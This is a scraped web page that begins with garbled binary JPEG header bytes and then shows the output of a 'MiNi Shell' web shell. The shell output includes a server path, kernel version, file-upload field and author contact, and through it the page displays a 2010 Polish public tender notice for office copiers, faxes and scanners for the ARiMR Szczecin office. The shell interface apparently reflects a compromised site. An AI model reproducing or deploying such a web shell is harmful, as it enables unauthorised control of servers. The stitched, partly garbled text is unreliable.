JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100430/121538-N-2010.html

<p class="kh_header"><b>Szczecin: DOSTAWA SPRZĘTU BIUROWEGO DLA ZACHODNIOPOMORSKIEGO ODDZIAŁU REGIONALNEGO I PODLEGŁYCH BIUR POWIATOWYCH AGENCJI RESTRUKTURYZACJI 
I MODERNIZACJI ROLNICTWA.</b><br>
<b>Numer ogłoszenia: 121538 - 2010; data zamieszczenia: 30.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Zachodniopomorski Oddział Regionalny , ul. Szafera 10, 71-245 Szczecin, woj. zachodniopomorskie, tel. 091 4698400, faks 091 4394763.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa osoba prawna, Agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA SPRZĘTU BIUROWEGO DLA ZACHODNIOPOMORSKIEGO ODDZIAŁU REGIONALNEGO I PODLEGŁYCH BIUR POWIATOWYCH AGENCJI RESTRUKTURYZACJI 
I MODERNIZACJI ROLNICTWA..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmotem zamówienia jest:
1.Dostawa wraz z uruchomieniem fabrycznie nowych 18 szt.  cyfrowych kserokopiarek laserowych i 8 szt. faksów laserowych z pełnowartościowym kompletem materiałów eksploatacyjnych oraz 3 szt. skanerów komputerowych z kompletem okablowania, o parametrach technicznych określonych w SIWZ Opis przedmiotu zamówienia rozdział I oraz we wzorach umów stanowiących załącznik nr 4 A i 4 B do SIWZ,  na potrzeby Zachodniopomorskiego Oddziału Regionalnego i podległych Biur Powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa.
2.Dostawa wraz z wniesieniem do wskazanych przez Zamawiającego pomieszczeń i uruchomienie cyfrowych kserokopiarek laserowych, faksów laserowych i skanerów komputerowych zwanych w treści SIWZ sprzętem ma nastąpić w lokalizacjach wskazanych przez Zamawiającego w załączniku nr 3 do wzoru umów stanowiących załącznik nr 4 A i 4B do SIWZ.  
3.Zamawiający dopuszcza składanie ofert częściowych na realizację przedmiotu zamówienia w zakresie następujących części zamówienia zwanych dalej zadaniami:
Zadanie nr 1 - dostawa 18 szt. kserokopiarek do Biur Powiatowych 
Zadanie nr 2 - dostawa 8 szt. faksów do Zachodniopomorskiego Oddziału Regionalnego
Zadanie nr 3 - dostawa 3 szt. skanerów do Zachodniopomorskiego Oddziału Regionalnego 
4.Wykonawca w ramach realizacji niniejszego zamówienia zobowiązany jest do:
Zadanie nr 1
a)udzielenia Zamawiającemu gwarancji min. 36 miesięcznej na dostarczony sprzęt,
b)przekazania, nie później niż w dniu dostawy, kart gwarancyjnych (do każdego urządzenia) zawierających warunki udzielenia gwarancji określone przez Zamawiającego we wzorze umowy stanowiącym załącznik nr 4A do SIWZ,
c)uwzględnienia w cenie sprzedaży sprzętu kosztów związanych z  dostarczeniem sprzętu,  wniesieniem  i uruchomieniem w lokalizacjach wskazanych we wzorze umowy stanowiącym załączniku nr 4 A do SIWZ, 
d)uwzględnienia w cenie sprzedaży sprzętu pełnowartościowego kompletu materiałów eksploatacyjnych (tonerów w ilości umożliwiającej wydruk min. 15 000 kopii przy 5 % zaczernieniu strony), niezbędnych do uruchomienia i użytkowania sprzętu,
e)udzielenia Zamawiającemu 6 miesięcznej gwarancji na dostarczony wraz z kserokopiarkami pełnowartościowy komplet materiałów eksploatacyjnych, 
f)nieodpłatnego przeszkolenia, nie później niż w dniu dostawy, w każdej lokalizacji określonej we wzorze umowy stanowiącym załącznik nr 4 A do SIWZ, co najmniej dwóch pracowników wskazanych przez przedstawicieli Zamawiającego, w zakresie obsługi i użytkowania sprzętu,
g)nieodpłatnego dostarczenia Zamawiającemu, nie później niż w dniu dostawy:
- instrukcji obsługi urządzenia (do każdego urządzenia),
- kompletu sterowników (do każdego urządzenia),
- wykazu materiałów eksploatacyjnych stosowanych w dostarczonym sprzęcie .
Wymagania dotyczące Wykonawcy:
a)Wykonawca zobowiązany jest w okresie udzielonej gwarancji na sprzęt  do nieodpłatnego wykonywania przeglądów konserwacyjnych sprzętu zgodnie z wymogami producenta, 
b)dojazd serwisu Wykonawcy do lokalizacji sprzętu w celu wykonania przeglądu konserwacyjnego dokonywany jest w całości na koszt Wykonawcy,
c)w okresie trwania gwarancji wszelkie koszty wymienianych części, za wyjątkiem tonerów ponosi Wykonawca,
d)Wykonawca dostarczy Zamawiającemu wyłącznie części i materiały eksploatacyjne zalecane przez producenta sprzętu.

Zadanie nr 2
a)udzielenia Zamawiającemu gwarancji min. 12 miesięcznej na dostarczony sprzęt,
b)przekazania, nie później niż w dniu dostawy, kart gwarancyjnych, wykazu materiałów eksploatacyjnych stosowanych w dostarczonym sprzęcie oraz warunków gwarancji producenta (do każdego urządzenia),  
c)uwzględnienia w cenie sprzedaży sprzętu kosztów związanych z  dostarczeniem sprzętu,  wniesieniem  i uruchomieniem w lokalizacjach wskazanych we wzorze umowy stanowiącym załączniku nr 4 B do SIWZ, 
d)uwzględnienia w cenie sprzedaży sprzętu pełnowartościowego kompletu materiałów eksploatacyjnych (tonerów ) niezbędnych do uruchomienia sprzętu,
e)w ramach udzielonej gwarancji Wykonawca zobowiązuje się usunąć nieodpłatnie wszystkie wady w działaniu sprzętu, spowodowane wadliwymi częściami lub defektami produkcyjnymi, a w przypadkach określonych w gwarancji, dokonać wymiany sprzętu na nowy, wolny od wad.

Zadanie nr 3
a)udzielenia Zamawiającemu gwarancji min. 12 miesięcznej na dostarczony sprzęt,
b)przekazania, nie później niż w dniu dostawy, kart gwarancyjnych oraz warunki gwarancji producenta (do każdego urządzenia)  
c)uwzględnienia w cenie sprzedaży sprzętu kosztów związanych z  dostarczeniem sprzętu,  wniesieniem  i uruchomieniem w lokalizacjach wskazanych we wzorze umowy stanowiącym załączniku nr 4 B do SIWZ, 
d)uwzględnienia w cenie sprzedaży sprzętu kosztu kompletu okablowania niezbędnego do uruchomienia sprzętu,
e)w ramach udzielonej gwarancji Wykonawca zobowiązuje się usunąć nieodpłatnie wszystkie wady w działaniu sprzętu, spowodowane wadliwymi częściami lub defektami produkcyjnymi, a w przypadkach określonych w gwarancji, dokonać wymiany sprzętu na nowy, wolny od wad.
5.Szczegółowe postanowienia regulujące realizację przedmiotu zamówienia w zakresie zadania nr 1, zadania nr 2 i nr 3 zawarte są we wzorach umów stanowiących załącznik nr 4 A, 4 B do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4, 30.12.14.10-0, 30.21.61.10-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Kwota i termin wniesienia wadium.
 1) oferta musi być zabezpieczona wadium w wysokości 2 500,00 zł (słownie zł: dwa tysiące pięćset 00/100), w przypadku złożenia oferty na całość zamówienia (wszystkie zadania); w przypadku złożenia ofert częściowych Wykonawca zobowiązany jest wnieść wadium:    
dla zadania nr 1 w wysokości 2 500,00 zł (słownie zł: dwa tysiące pięćset 00/100)
w przypadku złożenia oferty na zadanie nr 2 lub zadanie nr 3 wadium nie jest     
wymagane.
2) wadium musi obejmować okres związania ofertą, którego bieg rozpoczyna się wraz z upływem terminu  składania ofert,
UWAGA Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania Zamawiającego i Wykonawcy odnośnie w/w ustalenia będą podlegały - odpowiednio - nowym terminom,
3) termin wniesienia wadium upływa wraz z terminem składania ofert tj. do dnia 12.05.2010r. do godz. 11.30 wyznaczonej na składanie ofert. 
Zamawiający uzna, że termin wpłaty wadium został dotrzymany, jeżeli przed upływem terminu składnia ofert wadium znalazło się na koncie Zamawiającego,
4) Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu związania ofertą zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego.
2.Formy i miejsce wnoszenia wadium.
1) Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)gwarancjach ubezpieczeniowych lub bankowych,
d)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, ze zm.). 
2) Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego w BGŻ S.A.  O/Szczecin nr 69 2030 0045 1110 0000 0054 8950, z dopiskiem na przelewie Wadium - sprzęt biurowy - część I zamówienia.   
Kopię dowodu wniesienia wadium należy złożyć w ofercie.
3) Wadium wnoszone w formach wymienionych w pkt 1 lit. b-d, musi być wystawione na Agencję Restrukturyzacji i Modernizacji Rolnictwa Zachodniopomorski Oddział Regionalny, 71-245 Szczecin, ul. Szafera 10, należy złożyć w formie oryginału w siedzibie Zamawiającego w pokoju nr 50 (I              piętro) do terminu składania ofert tj. do dnia 12.05.2010r. do godz. 11.00.
Kopia dowodu wniesienia wadium, potwierdzona za zgodność z oryginałem przez Wykonawcę,  winna być złożona w ofercie składanej przez Wykonawcę.
Wykonawca dla celów dowodowych - powinien uzyskać dla siebie potwierdzenie złożenia wadium w siedzibie Zamawiającego. 
4)Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta/Poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4 a oraz art. 46 ust. 5 
ustawy - Prawo zamówień publicznych. 
3.Zwrot wadium.
1)  Zamawiający zwróci wadium wszystkim Wykonawcom którzy złożyli ofertę w zakresie I części zamówienia niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem okoliczności określonych w art. 46 ust. 4 a ustawy -Prawo zamówień publicznych, mówiących o zatrzymaniu wadium na rzecz Zamawiającego wraz z odsetkami w przypadku gdy Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.   
2)Wykonawcy, którego oferta została wybrana jako najkorzystniejsza w zakresie I części zamówienia, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
3)Zamawiający zwróci wadium niezwłocznie na wniosek Wykonawcy, który wycofał ofertę złożoną na zadanie nr 1 przed upływem terminu składania ofert.  
4)Zamawiający żąda ponownego wniesienia wadium w zakresie I części zamówienia przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy - Prawo zamówień publicznych, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.  
5)Wadium wniesione w pieniądzu, Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.  
  4.   Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została  wybrana: 
1)	odmówił podpisania umowy w sprawie zamówienia publicznego w zakresie zadania nr 1 na warunkach określonych w ofercie,
2)	zawarcie umowy w sprawie zamówienia publicznego w zakresie zadania nr 1 stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku na podstawie oświadczenia zgodnego z wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek posiadania wiedzy i doświadczenia do wykonania zamówienia w zakresie zadania nr 1 Zamawiający uzna Wykonawców, którzy wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  co najmniej dwie dostawy odpowiadające, swoim rodzajem, dostawie stanowiącej  przedmiot zamówienia w zakresie zadania nr 1, polegających na dostawie sprzętu biurowego w tym kserokopiarek, o wartości nie niższej niż 80 000,00 zł brutto każda. Zamawiający zastosuje kryterium spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku na podstawie oświadczenia zgodnego z wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku na podstawie oświadczenia zgodnego z wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/ nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie ww warunku na podstawie oświadczenia zgodnego z wzorem wg załącznika nr 2 do SIWZ. Zamawiający zastosuje kryterium spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa
Zachodniopomorski Oddział Regionalny 
ul. Szafera 10
71-245 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2010 godzina 11:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa
Zachodniopomorski Oddział Regionalny 
ul. Szafera 10
71-245 Szczecin, pokój nr 2 Kancelaria - parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa 18 szt. kserokopiarek cyfrowych  laserowych do Biur Powiatowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 18 szt. kserokopiarek laserowych z pełnowartościowym kompletem materiałów eksploatacyjnych do lokalizacji wskazanych przez Zamawiającego w załączniku nr 3 do wzoru umowy stanowiącej załącznik nr 4 A  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.11.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa 8 szt. faksów laserowych do Zachodniopomorskiego Oddziału Regionalnego..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 8 szt. faksów laserowych z pełnowartościowym kompletem materiałów eksploatacyjnych do Zachodniopomorskiego Oddziału Regionalnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.14.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa 3 szt. skanerów komputerowych do Zachodniopomorskiego Oddziału Regionalnego z kompletem okablowania..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa 3 szt. skanerów komputerowych do Zachodniopomorskiego Oddziału Regionalnego z kompletem okablowania niezbędnego do uruchomienia sprzętu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.61.10-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com